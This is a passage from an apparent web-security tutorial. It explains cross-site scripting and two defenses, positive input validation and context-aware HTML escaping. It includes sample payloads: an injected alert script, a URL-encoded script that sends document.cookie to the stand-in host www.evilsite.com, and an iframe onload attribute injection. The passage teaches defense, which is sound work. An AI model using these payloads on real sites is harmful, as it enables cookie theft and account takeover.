But what happens if someone can get you to click on a link to http://www.example.com/mycgi?username=Fred<<script>>alert(‘Uh oh’);<</script>>? The CGI might write the following HTML into the resulting page:
Hello, <<b>>Fred<<script>>alert('Uh oh');<</script>><</b>>
http://www.example.com/mycgi?username=Fritz%3Cscript%3E%0A%28new%20Image%29.src%3D %27http%3A//www.evilsite.com/%3Fstolencookie%3D%27+escape%28document.cookie%29%3B% 0A%3C/script%3E
First, note that potentially problematic characters such as <<, :, and ? have been URL encoded so as not to confuse the browser. Now consider the resulting HTML that would be written into the page:
Hello, <<b>>Fritz <<script>> (new Image).src='http://www.evilsite.com/?stolencookie='+ escape(document.cookie); <</script>><</b>>
This script causes the browser to try to load an image from www.evilsite.com, and includes in the URL any cookies the user has for the current site (www.example.com). The fact that this image doesn’t exist is not important; the user won’t see it anyway. What is important is to notice that the attacker presumably runs www.evilsite.com, and now only has to look through his logs in order to find cookies that have been stolen from unsuspecting users. Since most sites store login information in cookies, this could potentially let the attacker log in with his victims’ identities.
Cross-site scripting attacks aren’t limited to stealing cookies. Anything undesirable that is prevented by the same origin policy could happen. For example, the script could just as easily have snooped on the user’s keypresses and sent them to www.evilsite.com. The same origin policy doesn’t apply here: the browser has no way of knowing that www.example.com didn’t intend for the script to appear in the page.
You should use a two-pronged approach to preventing cross-site scripting attacks. The first tenet is to always positively validate user input at the server (i.e., in your CGI, PHP, and so on). You should check submitted form values against regular expressions that are known to be “good” (or use equivalent logic to make the determination). This is as opposed to checking values for undesirable characters, which we term “negative” validation. For example, if usernames are supposed to be alphanumeric characters, ensure that inputs match a regular expression such as ^[a-zA-Z0-9]+$ instead of looking for potentially problematic non-alphanumeric characters. Positive matching is superior to negative matching because there’s no opportunity to make a mistake by forgetting to search for a particular “bad” character.
The second approach is to always HTML-escape data before writing it into a Web page. HTML-escaping replaces meaningful HTML characters such as << and >> with their entity equivalents, in this case < and >. Doing so ensures that even if malicious input makes it past your input validation code, it will be rendered harmless when written into the page.
Note that how data must be escaped to be safe for output (termed output sanitization) depends on how it is written into the page. For example, if the user passes in a URL to be written into an <<iframe>>:
<<iframe src="VALUEGOESHERE">> <</iframe>>
An attacker could pass in http://somelegitsite.com"%20onload="evilJSFunction()" as the URL (%20 is a space). This would be decoded and inserted into the page, resulting in:
<<iframe src="http://somelegitsite.com" onload="evilJSFunction()">> <</iframe>>
Merely escaping << and >> is not sufficient; you need to be aware of the context of output as well. A policy of escaping &, <<, >>, and parentheses, as well as single and double quotes, is often the best way to go.